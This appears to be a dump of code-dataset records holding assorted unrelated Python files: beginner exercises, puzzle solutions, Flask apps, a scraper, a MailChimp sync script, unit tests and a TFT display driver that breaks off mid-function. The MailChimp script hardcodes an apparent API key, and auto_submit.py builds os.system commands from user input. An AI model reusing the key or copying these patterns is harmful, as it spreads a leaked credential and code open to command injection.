'Es primo'\n elif num >= 2 and num%num == 0 and num%1 == 0 and num%2 != 0:\n return 'Es primo'\n else:\n return 'No es primo'\n\ndef billetes_verdes(cant):\n \"\"\"\n\n Str -> num\n :param cant: valor de una cantidad en euros\n :return: los billetes\n\n >>> billetes_verdes('434')\n '2 billetes de 200 1 billete de 20 euros 1 billete de 10 euros 2 monedas de 2 euros'\n >>> billetes_verdes('626')\n '3 billetes de 200 1 billete de 20 euros 3 monedas de 2 euros'\n >>> billetes_verdes('1298')\n '6 billetes de 200 4 billete de 20 euros 1 billete de 10 euros 4 monedas de 2 euros'\n\n \"\"\"\n\n billetes_200 = int(cant) // 200\n new_1 = int(cant) % 200\n billetes_20 = new_1 // 20\n new_2 = new_1 % 20\n billetes_10 = new_2 // 10\n new_3 = new_2 % 10\n monedas_2 = new_3 // 2\n new_4 = new_3 % 2\n\n mensaje = ''\n\n if (billetes_200):\n mensaje += str(billetes_200) + ' billetes de 200 '\n\n if (billetes_20):\n mensaje += str(billetes_20) + ' billete de 20 euros '\n\n if (billetes_10):\n mensaje += str(billetes_10) + ' billete de 10 euros '\n\n if (monedas_2):\n mensaje += str(monedas_2) + ' monedas de 2 euros'\n\n return ('%s' % mensaje.rstrip('\\n'))","sub_path":"Semana_5/ejemplos_if_2.py","file_name":"ejemplos_if_2.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143819953","text":"import ast\n\n\ndef parse_line(char, start):\n coordinates = start # [x, y]\n if char == \">\":\n coordinates[0] += 1\n elif char == \"<\":\n coordinates[0] -= 1\n elif char == \"^\":\n coordinates[1] += 1\n elif char == \"v\":\n coordinates[1] -= 1\n else:\n raise Exception(\"Invalid character: \" + char)\n\n return coordinates\n\n\ndef solve(puzzle_input):\n visited1 = [[0, 0]]\n start1 = [0, 0]\n for char_index in range(0, len(puzzle_input), 2):\n char = puzzle_input[char_index]\n data = parse_line(char, start1)\n if data not in visited1:\n visited1.append(data[:])\n start1 = data\n\n visited2 = [[0, 0]]\n start2 = [0, 0]\n for char_index in range(1, len(puzzle_input), 2):\n char = puzzle_input[char_index]\n data = parse_line(char, start2)\n if data not in visited2:\n visited2.append(data[:])\n start2 = data\n\n # No need to do this anymore, as we list(set()) the list. visited2.remove([0, 0]) # [0, 0] is already in visited1\n visited = visited1 + visited2\n\n # Unhashable type 'list' bypass\n visited_string_list = []\n for i in visited:\n visited_string_list.append(str(i))\n visited_string_list = list(set(visited_string_list)) # Remove duplicates\n\n visited = []\n for i in visited_string_list:\n visited.append(ast.literal_eval(i))\n\n print(visited)\n total = len(visited)\n\n return total\n\n\ndef main():\n f = open(\"puzzle_input\")\n puzzle_input = f.read()\n f.close()\n\n solution = solve(puzzle_input)\n print(solution)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2015/3/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343603863","text":"import requests\nimport sys\nimport logging\nimport json\nimport hashlib\n\nlogging.basicConfig(level=logging.INFO)\nauth = \"a6416f0279b825c0c434ba0c5e043b0e-us14\"\nlog = logging.getLogger(\"Check:\")\nurl = \"https://us14.api.mailchimp.com/3.0\"\nauthorize = (\"Username\", \"a6416f0279b825c0c434ba0c5e043b0e-us14\")\n\n\ndef get_info():\n tester = requests.get(\"{}/lists/472f5e896c/members\".format(url), auth=authorize)\n log.info(tester.content)\n new_dict = tester.content\n return new_dict\n\n\ndef make_json(email, first, last, git):\n diction = {\n \"email_address\": email,\n \"status\": \"subscribed\",\n \"merge_fields\": {\n \"FNAME\": first,\n \"LNAME\": last,\n \"GITHUB\": git,\n \"ONBOARDED\": 1\n }\n }\n return diction\n\n\ndef mail_chimp():\n diction = json.loads(get_info())\n new = diction[\"members\"]\n for key in new:\n if key[\"merge_fields\"][\"ONBOARDED\"]:\n log.info(\"ONBOARDED\")\n fname = \"null\"\n lname = \"null\"\n git = \"null\"\n on = 1\n else:\n email = key[\"email_address\"]\n temp_hash = hashlib.md5(email.encode())\n email_hash = temp_hash.hexdigest()\n log.info(email_hash)\n fname = key[\"merge_fields\"][\"FNAME\"]\n lname = key[\"merge_fields\"][\"LNAME\"]\n git = key[\"merge_fields\"][\"GITHUB\"]\n on = key[\"merge_fields\"][\"ONBOARDED\"]\n stag = {\n \"FNAME\": fname,\n \"LNAME\": lname,\n \"GITHUB\": git,\n \"EMAIL\": email\n }\n info = make_json(email, fname, lname, git)\n req = requests.patch(\"{}/lists/472f5e896c/members/{}\".format(url, email_hash), data=json.dumps(info),\n auth=authorize)\n log.info(req.content)\n log.info(stag)\n return stag\n return 0\n\n\nif __name__ == \"__main__\":\n log.info(mail_chimp())\n get_info()\n","sub_path":"src/add_to_accounts/MailChimp.py","file_name":"MailChimp.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"363614191","text":"import os\nimport urllib.parse\nfrom flask import current_app\n\n\ndef get_template(template_name: str) -> str:\n \"\"\"\n Helper function to read the template from disk and return as a string to be manipulated\n :param template_name: The template we want to load\n :return: Template as a string\n \"\"\"\n try:\n template_location = os.path.join(os.path.dirname(__file__), 'templates/{0}'.format(template_name))\n with open(template_location, mode='r', encoding='utf-8') as template:\n return template.read()\n except FileNotFoundError:\n current_app.logger.error('Unable open file {0}'.format(template_location))\n raise ValueError('Unable open file {0}'.format(template_location))\n\n\ndef get_profile_url(username: str):\n \"\"\" Helper function returns the URL of the supplied users profile \"\"\"\n base_url = current_app.config['APP_BASE_URL']\n return f'{base_url}/user/{urllib.parse.quote(username)}'\n","sub_path":"server/services/messaging/template_service.py","file_name":"template_service.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78952726","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\n\ndef get_data(html):\n soup = BeautifulSoup(html, 'lxml')\n header = soup.find('div', id='home-welcome').find('header')\n h1_text = header.find('h1').text\n p_text = header.find('p').text\n title = f'{h1_text}\\n{p_text}'\n return title\n\n\ndef main():\n url = 'https://wordpress.org/'\n print(get_data(get_html(url)))\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"course/simple_parser.py","file_name":"simple_parser.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559177074","text":"import sys\nimport os\nimport threading\niterations = 10\ntimer = 5\nproblemID = ''\nmainId = ''\nfiles = ''\nrestart = False;\niteration_num = 0;\n\n\ndef parameters():\n global iterations\n global timer\n global problemID\n global files\n global mainId\n while True:\n try:\n # cast to int\n # if no value is entered catch the exception and use defualt values\n iterations = int(\n input('Enter number of iterations for submission (An integer, Default: 10):\\n'))\n if iterations <= 0 or iterations > 500:\n print('Must submit at least once and cannot submit more than 500 times');\n continue;\n print(\"# iterations: \", iterations, \"\\n\");\n break;\n except ValueError:\n # got something that could not be cast to a int. Interpret as user wanting default value.\n print(\"Default value used.\");\n iterations = 10;\n print(\"# iterations: \", iterations, \"\\n\");\n break;\n while True:\n try:\n if iterations == 1:\n print('timer value irrelevant for one submission\\n');\n break;\n\n # cast to int\n # if no value is entered catch the exception and use defualt values\n timer = int(input('Enter time interval before new submission (in minutes, Default: 5):\\n'));\n print(\"time (minutes): \", timer, \"\\n\");\n break;\n except ValueError:\n # got something that could not be cast to a int. Interpret as user wanting default value.\n print(\"Default value used.\");\n timer = 5;\n print(\"time (minutes): \", timer, \"\\n\");\n break;\n while True:\n try:\n # cast to string\n # value must be entered continue until any string, make sure it's a valid problem id.\n problemID = str(input('Enter unique problem id:\\n'))\n if problemID == '' :\n print('Unique problem id must be specified');\n continue;\n print(\"problem id: \", problemID, \"\\n\");\n break;\n except Exception:\n # Catch any exception\n print('An error occured');\n break;\n while True:\n try:\n # cast to string\n # user must choose main file\n mainId = str(input('Enter name of main file:\\n'))\n if mainId == '':\n print('Main file must be specified');\n continue;\n print('main file is: ', mainId, \"\\n\");\n break;\n except Exception:\n # Catch any exception\n print('An error occured');\n break;\n\ndef prepare_project_files():\n global files;\n print('Files that will be included in submission are:');\n split_files = os.listdir('./project_files');\n proj_files = \"./project_files/{0}\".format(split_files[0]);\n print(split_files[0]);\n for i in range (1, len(split_files)):\n temp = \" ./project_files/{0}\".format(split_files[i]);\n proj_files += temp;\n print(split_files[i]);\n files = proj_files;\n\n\ndef submit():\n global iterations;\n global iteration_num;\n if iterations == 0:\n print('Finished submitting...program closing');\n sys.exit(0);\n else:\n try:\n iterations -= 1;\n iteration_num += 1;\n print('Running iteration: ', iteration_num);\n submit_req = \"python ./submit.py {0} -p {1} -m {2}\".format(\n files, problemID, mainId);\n os.system(submit_req);\n if iterations == 0:\n print('Finished submitting...program closing');\n sys.exit(0);\n threading.Timer((timer * 60), submit).start();\n except Exception:\n raise Exception('An error occured during submission number: ', iteration_num);\n\ndef main():\n parameters();\n run = True;\n while run:\n try:\n start = str(input('Do you want to start automation? (Y/N), Default is yes.')).lower();\n if start == 'y' or start == '':\n prepare_project_files();\n submit();\n run = False;\n elif start == 'n':\n print('Program exited');\n run = False;\n sys.exit(0);\n except Exception as e:\n print(e);\n run = False;\n sys.exit(0);\n\nif __name__ == '__main__':\n main()\n","sub_path":"auto_submit.py","file_name":"auto_submit.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651003039","text":"from http import HTTPStatus\nfrom unittest import mock\n\nfrom authlib.jose import jwt\nfrom pytest import fixture\n\nfrom .utils import headers\n\n\ndef routes():\n yield '/health'\n\n\n@fixture(scope='module', params=routes(), ids=lambda route: f'POST {route}')\ndef route(request):\n return request.param\n\n\ndef test_health_call_with_invalid_jwt_failure(route, client, invalid_jwt):\n response = client.post(route, headers=headers(invalid_jwt))\n\n expected_payload = {\n 'errors': [\n {\n 'code': 'authorization failed',\n 'message': ('Authorization failed: '\n 'Failed to decode JWT with provided key'),\n 'type': 'fatal',\n }\n ]\n }\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n\n\ndef test_health_call_success(route, client, valid_jwt):\n app = client.application\n\n target = 'api.health.get_events_for_entity'\n\n # Nothing really matters...\n data = ...\n\n with mock.patch(target) as get_events_for_entity_mock:\n get_events_for_entity_mock.return_value = (data, None)\n\n response = client.post(route, headers=headers(valid_jwt))\n\n key = jwt.decode(valid_jwt, app.config['SECRET_KEY'])['key']\n entity = app.config['GTI_TEST_ENTITY']\n\n get_events_for_entity_mock.assert_called_with(key, entity)\n\n expected_payload = {'data': {'status': 'ok'}}\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n\n\ndef test_health_call_with_auth_error_from_gti_failure(route,\n client,\n valid_jwt):\n app = client.application\n\n target = 'api.health.get_events_for_entity'\n\n error = {\n 'code': 'client.invalid_authentication',\n 'message': 'Authentication is invalid.',\n }\n\n with mock.patch(target) as get_events_for_entity_mock:\n get_events_for_entity_mock.return_value = (None, error)\n\n response = client.post(route, headers=headers(valid_jwt))\n\n key = jwt.decode(valid_jwt, app.config['SECRET_KEY'])['key']\n entity = app.config['GTI_TEST_ENTITY']\n\n get_events_for_entity_mock.assert_called_with(key, entity)\n\n expected_payload = {\n 'errors': [\n {\n 'code': 'client : invalid authentication',\n 'message': 'Authentication is invalid.',\n 'type': 'fatal',\n }\n ]\n }\n\n assert response.status_code == HTTPStatus.OK\n assert response.get_json() == expected_payload\n","sub_path":"tests/unit/api/test_health.py","file_name":"test_health.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246995927","text":"def dodawanie(a,b):\n return a+b\ndef get_info():\n print('to jest prosty program kalkulator')\nget_info()\nprint('podaj pierwssza liczbe')\na=int(input())\nprint('podaj druga liczbe')\nb=int(input())\nprint(dodawanie (a,b))\n","sub_path":"kalkulator.py","file_name":"kalkulator.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244182712","text":"from django.shortcuts import render, redirect\nfrom submit.models import ScoreModel, SubmitModel\n\n# Create your views here.\ndef leaderboard_base_view(request):\n\n score_list = ScoreModel.objects.all().order_by('score_date')\n date_list = score_list.values_list('score_date', flat=True).distinct()\n\n context = {\n 'date_list':date_list,\n 'score_list':score_list\n }\n\n return render(request, 'leaderboard/leaderboard_list.html', context)","sub_path":"leaderboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487811063","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\n#获取网络信息\ndef get(url):\n try:\n headers={\"user-agent\":\"Mozilla/5.0\"}\n r=requests.get(url , timeout = 30 ,headers=headers)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n return r\n except Exception as e:\n return \"something wrong\"\n#存储图片信息\ndef store_pic(response):\n root = \"D://pic//\"\n path = root + response.url.split(\"/\")[-1]\n try:\n if not os.path.exists(root):\n os.mkdir(root)\n if not os.path.exists(path):\n with open(path,'wb') as f:\n f.write(response.content)\n f.close()\n print(\"文件保存成功\")\n else:\n print(\"文件已经存在\")\n except Exception as e:\n print(\"文件保存失败\")\n\nheaders={\"user-agent\":\"Mozilla/5.0\"}\nr = requests.get(\"https://www.bilibili.com\",headers=headers)\nr.encoding = r.apparent_encoding\nsoup = BeautifulSoup(r.text,\"html.parser\")\nfor link in soup.find_all('img'):\n\turl=\"http://\"+link.get('src')\n\tif url is None:\n\t\tcontinue\n\tstore_pic(get(url))","sub_path":"beatufulsoup_test.py","file_name":"beatufulsoup_test.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11374909","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\n\ndef parse_targets(y_label):\n y_class = []\n y_box = []\n \n for i in y_label:\n \ti_list = i.split(' ')\n \ty_class.append(int(i_list[0]))\n \ty_box.append([float(j) for j in i_list[1:5]])\n \n return np.array(y_class), np.array(y_box)\n\ndef get_file_list(file_path):\n with open(file_path, 'r') as f:\n file_list = f.read().splitlines()\n return file_list","sub_path":"utils_misc.py","file_name":"utils_misc.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631763009","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_migrate import Migrate\nfrom flask_swagger import swagger\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom admin import setup_admin\nfrom models import db, User, Planet, Character\n#from models import Person\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DB_CONNECTION_STRING')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nMIGRATE = Migrate(app, db)\ndb.init_app(app)\nCORS(app)\nsetup_admin(app)\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef handle_invalid_usage(error):\n return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n return generate_sitemap(app)\n\n@app.route('/user', methods=['GET'])\ndef handle_hello():\n\n response_body = {\n \"msg\": \"Hello, this is your GET /user response \"\n }\n\n return jsonify(response_body), 200\n\n@app.route('/create', methods=['GET'])\ndef create():\n user = User(username='Karina', email = 'prueba@example.com', password='1')\n planet = Planet (name='Earth')\n planet1 = Planet (name='Pluton')\n character1 = Character(name='Luke Skywalker')\n character2 = Character (name='Princess Leia')\n user.favorite_planets.append(planet)\n user.favorite_planets.append(planet1)\n user.favorite_characters.append(character1)\n user.favorite_characters.append(character2)\n\n db.session.add(user)\n db.session.commit()\n\n return jsonify([]), 200\n \n@app.route('/people', methods=['GET'])\ndef get_characters():\n characters = Character.query.all()\n characters = list(map (lambda character: character.serialize(), characters))\n return jsonify(characters), 200\n\n@app.route('/people/', methods=['GET'])\ndef get_character(people_id):\n character = Character.query.get(people_id)\n return jsonify(character.serialize()), 200\n\n@app.route('/planets', methods=['GET'])\ndef get_planets():\n planets = Planet.query.all()\n planets = list(map (lambda planet: planet.serialize(), planets))\n return jsonify(planets), 200\n\n@app.route('/planets/', methods=['GET'])\ndef get_planet(planet_id):\n planet = Planet.query.get(planet_id)\n return jsonify(planet.serialize()), 200\n\n@app.route('/users', methods=['GET'])\ndef get_users():\n users = User.query.all()\n users = list(map (lambda user: user.serialize(), users))\n return jsonify(users), 200\n\n@app.route('/users//favorites', methods=['GET'])\ndef get_user_favorites(user_id):\n user = User.query.get(user_id)\n favorites = []\n for character in user.favorite_characters:\n favorites.append(character.name)\n for planet in user.favorite_planets:\n favorites.append(planet.name)\n\n return jsonify(favorites), 200\n\n@app.route('/favorite/planet/', methods=['POST'])\ndef add_favorite_planet(planet_id):\n planet = Planet.query.get(planet_id)\n user = User.query.get(1)\n user.favorite_planets.append(planet_id)\n db.session.commit()\n return jsonify(planet.serialize()), 200\n\n@app.route('/favorite/people/', methods=['POST'])\ndef add_favorite_character(character_id):\n character = Character.query.get(character_id)\n user = User.query.get(1)\n user.favorite_characters.append(character_id)\n db.session.commit()\n return jsonify(character.serialize()), 200\n\n@app.route('/favorite/people/', methods=['DELETE'])\ndef delete_favorite_character(character_id):\n character = Character.query.get(character_id)\n user = User.query.get(1)\n character_position = user.favorite_characters.index(character)\n user.favorite_characters.pop(character_position)\n db.session.commit()\n return jsonify(character.serialize()), 200\n\n@app.route('/favorite/planets/', methods=['DELETE'])\ndef delete_favorite_planet(planet_id):\n planet = Planet.query.get(planet_id)\n user = User.query.get(1)\n planet_position = user.favorite_planets.index(planet)\n user.favorite_planets.pop(planet_position)\n db.session.commit()\n return jsonify(planet.serialize()), 200\n \n# this only runs if `$ python src/main.py` is executed\nif __name__ == '__main__':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=False)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9034634","text":"import math\n\ndef isPrime(number):\n\tif number%3 == 0:\n\t\treturn False\n\tif number%2 == 0:\n\t\treturn False\n\telse:\n\t\tcheckRange = int(math.ceil(math.sqrt(number)))\n\t\ti = 6\n\t\tfinished = False\n\t\twhile finished == False:\n\t\t\tif number%(i-1) == 0:\n\t\t\t\treturn False\n\t\t\tif number%(i+1) == 0:\n\t\t\t\treturn False\n\t\t\t#\n\t\t\ti += 6\n\t\t\tif i > checkRange:\n\t\t\t\tfinished = True\n\t\treturn True\n\ndef numToList(num):\n\tstrA = str(num)\n\taList = [0]*len(strA)\n\t#\n\tfor i in range(1,len(strA)+1):\n\t\taList[i-1] = int(strA[i-1:i])\n\treturn aList\n\t\ndef listEqual(listA,listB):\n\tequal = True\n\tfor i in range(0,len(listA)):\n\t\tif(listA[i] != listB[i]):\n\t\t\tequal = False\n\treturn equal\n\t\ndef sameDigits(numA,numB,numC):\n\taList = numToList(numA)\n\tbList = numToList(numB)\n\tcList = numToList(numC)\n\t#Sort low to high\n\taList.sort()\n\tbList.sort()\n\tcList.sort()\n\t#\n\tif(listEqual(aList,bList) == True) and (listEqual(aList,cList)):\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n#Pre-calculate all of the primes between 1000 to 9999\nprimes = [False]*10000\nprimesList = []\nfor i in range(1001,9999,2):\n\tif(isPrime(i) == True):\n\t\tprimes[i] = True\n\t\tprimesList.append(i)\n#\n\nfor i in range(0,len(primesList)-2):\n\tcurrentPrime = primesList[i]\n\tupperRange = float(9999 - primesList[i])\n\tupperRange = math.ceil(upperRange / 2.0) \n\tfor j in range(2,upperRange,2):\n\t\tif(primes[currentPrime+j] == True):\n\t\t\tif(currentPrime+2*j) <= 9999:\n\t\t\t\tif(primes[currentPrime+2*j] == True):\n\t\t\t\t\tif(sameDigits(currentPrime,currentPrime+j,currentPrime+2*j)):\n\t\t\t\t\t\tprint(\"Solution\")\n\t\t\t\t\t\tprint(currentPrime)\n\t\t\t\t\t\tprint(currentPrime+j)\n\t\t\t\t\t\tprint(currentPrime+2*j)","sub_path":"problem49.py","file_name":"problem49.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"402300495","text":"from selenium import webdriver\nfrom time import sleep\n\nlink = 'http://suninjuly.github.io/wait1.html'\nbrowser = webdriver.Chrome()\nbrowser.implicitly_wait(5) # браузер будет ждать появление (прогрузку) каждого элемента 5 секунду и пытаться достучаться до него каждые 500 милисекунд\ntry:\n browser.get(link)\n submit_btn = browser.find_element_by_class_name('btn')\n submit_btn.click()\n check_elemetn_text = browser.find_element_by_id('verify_message').text\n print(check_elemetn_text)\nfinally:\n sleep(2)\n browser.close()\n\n","sub_path":"2.4.5_implicit_waits.py","file_name":"2.4.5_implicit_waits.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"214625768","text":"def first_pal(word, left, right):\n while left < right:\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n del_left = second_pal(word, left+1, right)\n del_right = second_pal(word, left, right-1)\n if (del_left or del_right):\n return 1\n else:\n return 2\n return 0\n\ndef second_pal(word, left, right):\n while left < right:\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n return False\n return True\n\n\n\nT = int(input())\nfor tc in range(1, T+1):\n word = input()\n left = 0\n right = len(word) - 1\n print(first_pal(word, left, right))\n\n\n# 시간초과\n# def ispal(testword):\n# for w in range(len(testword)):\n# ispal = testword[0:w] + testword[w+1:]\n# if ispal == ispal[::-1]:\n# return 1\n# return 2\n\n\n# T = int(input())\n# for tc in range(1, T+1):\n# word = input()\n\n# if word == word[::-1]:\n# print(0)\n\n# else:\n# print(ispal(word))","sub_path":"b17609.py","file_name":"b17609.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559546342","text":"\"\"\"Unit tests for the Poincare ball.\"\"\"\n\nimport pytest\n\nimport geomstats.backend as gs\nfrom geomstats.geometry.hyperboloid import Hyperboloid\nfrom geomstats.geometry.poincare_ball import PoincareBall, PoincareBallMetric\nfrom tests.conftest import Parametrizer\nfrom tests.data.poincare_ball_data import (\n PoincareBallTestData,\n TestDataPoincareBallMetric,\n)\nfrom tests.geometry_test_cases import OpenSetTestCase, RiemannianMetricTestCase\n\n\nclass TestPoincareBall(OpenSetTestCase, metaclass=Parametrizer):\n space = PoincareBall\n skip_test_projection_belongs = True\n\n testing_data = PoincareBallTestData()\n\n def test_belongs(self, dim, point, expected):\n space = self.space(dim)\n result = space.belongs(gs.array(point))\n self.assertAllClose(result, gs.array(expected))\n\n def test_projection_norm_lessthan_1(self, dim, point):\n space = self.space(dim)\n projected_point = space.projection(gs.array(point))\n result = gs.sum(projected_point * projected_point) < 1.0\n self.assertTrue(result)\n\n\nclass TestPoincareBallMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n metric = connection = PoincareBallMetric\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_geodesic_ivp = True\n skip_test_exp_belongs = True\n skip_test_geodesic_ivp_belongs = True\n\n testing_data = TestDataPoincareBallMetric()\n\n def test_mobius_out_of_the_ball(self, dim, x, y):\n metric = self.metric(dim)\n with pytest.raises(ValueError):\n metric.mobius_add(gs.array(x), gs.array(y), project_first=False)\n\n def test_log(self, dim, point, base_point, expected):\n metric = self.metric(dim)\n result = metric.log(gs.array(point), gs.array(base_point))\n self.assertAllClose(result, gs.array(expected))\n\n def test_dist_pairwise(self, dim, point, expected):\n metric = self.metric(dim)\n result = metric.dist_pairwise(gs.array(point))\n self.assertAllClose(result, gs.array(expected), rtol=1e-3)\n\n def test_dist(self, dim, point_a, point_b, expected):\n metric = self.metric(dim)\n result = metric.dist(gs.array(point_a), gs.array(point_b))\n self.assertAllClose(result, gs.array(expected))\n\n def test_coordinate(self, dim, point_a, point_b):\n metric = self.metric(dim)\n point_a_h = PoincareBall(dim).to_coordinates(gs.array(point_a), \"extrinsic\")\n point_b_h = PoincareBall(dim).to_coordinates(gs.array(point_b), \"extrinsic\")\n dist_in_ball = metric.dist(gs.array(point_a), gs.array(point_b))\n dist_in_hype = Hyperboloid(dim).metric.dist(point_a_h, point_b_h)\n self.assertAllClose(dist_in_ball, dist_in_hype)\n\n def test_mobius_vectorization(self, dim, point_a, point_b):\n metric = self.metric(dim)\n\n dist_a_b = metric.mobius_add(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.mobius_add(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.mobius_add(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.mobius_add(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n def test_log_vectorization(self, dim, point_a, point_b):\n\n metric = self.metric(dim)\n dist_a_b = metric.log(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.log(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.log(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.log(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n def test_exp_vectorization(self, dim, point_a, point_b):\n\n metric = self.metric(dim)\n dist_a_b = metric.exp(point_a, point_b)\n\n result_vect = dist_a_b\n result = [metric.exp(point_a, point_b[i]) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n\n dist_a_b = metric.exp(point_b, point_a)\n\n result_vect = dist_a_b\n result = [metric.exp(point_b[i], point_a) for i in range(len(point_b))]\n result = gs.stack(result, axis=0)\n self.assertAllClose(result_vect, result)\n","sub_path":"tests/tests_geomstats/test_poincare_ball.py","file_name":"test_poincare_ball.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568575300","text":"\"\"\"\nclass DisplayTFT based upon TFT-display\n\nAdafruit: To make new bitmaps, make sure they are less\nthan 240 by 320 pixels and save them in 24-bit BMP format!\n\n2020-0516 PP TODO: add adafruit_gfx for drawing graphics\n2020-0516 PP new/basic, based upon tftbmp.py\n\"\"\"\nimport time\nimport math\nfrom machine import SPI, Pin\n# LoPy4 board specifications\nimport lopy4board as board\n# TFT ST7735 type of TFT-display\nfrom ST7735 import TFT, TFTColor\n# from sysfont import sysfont\n# Lelijk font: from seriffont import seriffont as sysfont\nfrom terminalfont import terminalfont as sysfont\n\n# TFT-display configuration\n# TFT_DC, TFT_RST, TFT_CS, TFT_BLK, TFT_SPEED\nfrom examples.displays.config_tft import *\n\nUSE_DEBUG = False\n\n\nclass DisplayTFT():\n\n def __init__(self, spi,\n dc_pin=TFT_DC, rst_pin=TFT_RST,\n cs_pin=TFT_CS, blk_pin=TFT_BLK):\n self._tft = TFT(spi, dc_pin, rst_pin, cs_pin)\n self._blkPin = blk_pin\n self._dcPin = dc_pin # ?: necessary?\n self._rstPin = rst_pin # ?: necessary?\n self._csPin = cs_pin # ?: necessary?\n self.init()\n\n def init(self):\n # DEBUG: print(\"DisplayTFT::init() entered...\")\n self._tft.initr()\n # alternative: self._tft.initb2()\n self._tft.rgb(True)\n\n # Backlight on or off\n def displayOn(self, isOnOff=True):\n self._blkPin.value(1 if isOnOff else 0)\n\n # erase TFT-display\n def blank(self):\n self._tft.fill(TFT.BLACK)\n\n def rotation(self, orient=0):\n assert (orient >= 0 and orient <= 4)\n self._tft.rotation(orient)\n\n def printPins(self):\n dcPin, rstPin, csPin, blkPin = self.pins\n print(\"DC={0}\\nRST={1}\\nCS={2}\\nBLK={3}\".format(\n dcPin, rstPin, csPin, blkPin)\n )\n\n @property\n def pins(self):\n return (\n self._dcPin,\n self._rstPin,\n self._csPin,\n self._blkPin,\n )\n\n # display BMP-image on display\n def displayBMP(self, filename, orient=0, font=sysfont):\n tft = self._tft\n if USE_DEBUG:\n print(\"File: {}\".format(filename), end=\", \")\n tft.rotation(orient) # PP added\n with open(filename, 'rb') as f:\n if f.read(2) == b'BM': # header\n dummy = f.read(8) # file size(4), creator bytes(4)\n offset = int.from_bytes(f.read(4), 'little')\n hdrsize = int.from_bytes(f.read(4), 'little')\n width = int.from_bytes(f.read(4), 'little')\n height = int.from_bytes(f.read(4), 'little')\n if int.from_bytes(f.read(2), 'little') == 1: # planes must be 1\n depth = int.from_bytes(f.read(2), 'little')\n if depth == 24 and int.from_bytes(f.read(4), 'little') == 0:#compress method == uncompressed\n if USE_DEBUG:\n print(\"image size:\", width, \"x\", height)\n rowsize = (width * 3 + 3) & ~3\n if height < 0:\n height = -height\n flip = False\n else:\n flip = True\n w, h = width, height\n if 